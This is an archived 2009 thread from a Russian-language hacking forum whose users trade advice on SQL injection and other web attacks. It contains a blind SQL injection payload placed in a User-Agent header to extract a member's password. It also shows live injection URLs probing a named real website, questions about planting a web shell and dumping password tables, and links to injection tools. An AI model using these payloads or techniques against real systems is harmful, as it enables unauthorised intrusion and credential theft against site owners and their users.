ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
26.04.2009, 16:59
|
|
Новичок
Регистрация: 26.03.2009
Сообщений: 25
Провел на форуме:
49768
Репутация:
0
|
|
как можно обойти HIDE в темах Vbulletin...??
|
|
|
26.04.2009, 20:48
|
|
Новичок
Регистрация: 02.02.2009
Сообщений: 19
Провел на форуме:
278694
Репутация:
9
|
|
Можно ли здесь чёта провернуть:
$update = mysql_query("UPDATE `chat_users` SET `time` = '".$online."', `place` = 0, `ip` = '".getenv('REMOTE_ADDR')."', `ua` = '".htmlspecialchars(getenv('HTTP_USER_AGENT')). "' WHERE `id` = '".$id."';");
если вставить свой код в HTTP_USER_AGENT? И если да то какой код надо? Заранее спс за ответ
|
|
|
|
26.04.2009, 22:18
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Сообщение от AngelOfFaith
если вставить свой код в HTTP_USER_AGENT?
Ну да. бенчмарк можно заюзать или мор1ров. Будет что-то вроде такого пакета
GET /script.php HTTP/1.1
Host: site.com
User-Agent: 1' and 1=(select null from members where length(if(ascii(substring((select pass from members where id=1),1,1))>1,pass,id))>1)/*
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Keep-Alive: 300
Connection: keep-alive
Сообщение от AngelOfFaith
И если да то какой код надо?
А это тебе виднее. Чего ты хочешь добиться то от инъекции ?
Рекомендую почитать http://forum.antichat.ru/thread35207.html
Сообщение от n1ceque
как можно обойти HIDE в темах Vbulletin...??
https://forum.antichat.ru/showthread.php?t=26987
С тех пор ничего не изменилось =)
Я надеюсь ты не на нулледе хайды хенкать хоч ?)) А то люди значит постят, стараются, работают на коллективное благо так сказать, а ты на все готовенькое хочешь ? Не хорошо, товарищ, не хорошо
Последний раз редактировалось ElteRUS; 26.04.2009 в 22:23..
|
|
|
|
27.04.2009, 16:20
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802
Репутация:
380
|
|
Подскажите здесь можно что то зделать, вот sql:
http://www.podklyuch.ru/index.php?go=Portfolio&in=page&id=24'+order+by+9--+
union не выходит провести(возможно еще как то изменяеться запрос и т.п. а возможно и бд не держит), а при blind как я понял фильтруються СКОБКИ.
БД по всей видимости MySQL:
http://www.podklyuch.ru/index.php?go=Portfolio&in=page&id=24'+and+@@global .sort_buffer_size+--+
но вот скобки скрипт по всей видимости не переваривает(именно одновременно 2-е скобки - открываюшиеся и закрываюшиеся):
http://www.podklyuch.ru/index.php?go=Portfolio&in=page&id=24'+and+1=1--+
http://www.podklyuch.ru/index.php?go=Portfolio&in=page&id=24'+and+(1)=1--+
и в hex тоже
http://www.podklyuch.ru/index.php?go=Portfolio&in=page&id=24'+and+%281%29= 1--+
Последний раз редактировалось PaCo; 27.04.2009 в 16:56..
Причина: Грамотей
|
|
|
|
26.04.2009, 22:31
|
|
Новичок
Регистрация: 02.02.2009
Сообщений: 19
Провел на форуме:
278694
Репутация:
9
|
|
хм, я читал эту статью только у меня постоянно белая страница вылазит(((
Как с этим боротся?
|
|
|
|
26.04.2009, 22:48
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Ещё один вопрос.
На сайте есть уязвимость выполнение php кода (php inj), однако запись практически везде запрещена, ну куда-то запись конечно есть.
Выполнение системных команд там невозможно как и инклуд.
Папки аватаров и прочей хрени тоже нету.
Что в этой ситуации можно сделать для залития шелла?
|
|
|
|
27.04.2009, 17:37
|
|
Познающий
Регистрация: 05.11.2008
Сообщений: 92
Провел на форуме:
1562063
Репутация:
149
|
|
чем можно сдампить ms sql базу?
чтобы руками не перебирать например такое
=1'+or+1=(select+top+1+cast(aliase+as+nvarchar)+fr om+part_pass+where+inc=1)--
1 потом 2,3 итд
|
|
|
|
28.04.2009, 13:08
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
Сообщение от Rav1n
чем можно сдампить ms sql базу?
чтобы руками не перебирать например такое
=1'+or+1=(select+top+1+cast(aliase+as+nvarchar)+fr om+part_pass+where+inc=1)--
1 потом 2,3 итд
http://kachakil.com/papers/SFX-SQLi-Bin.zip (если mssql 2005/2008)
|
|
|
|
27.04.2009, 17:39
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
хз, вроде нету таких тулз. для мускуля есть сипт4. напиши скрипт пхп простенький
|
|
|
|
27.04.2009, 18:05
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
http://pashkela.narod.ru/progi/bsqlbf-v2.1.zip
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?1248069){kind=avatar}
Похожие темы
Комбинированный вид
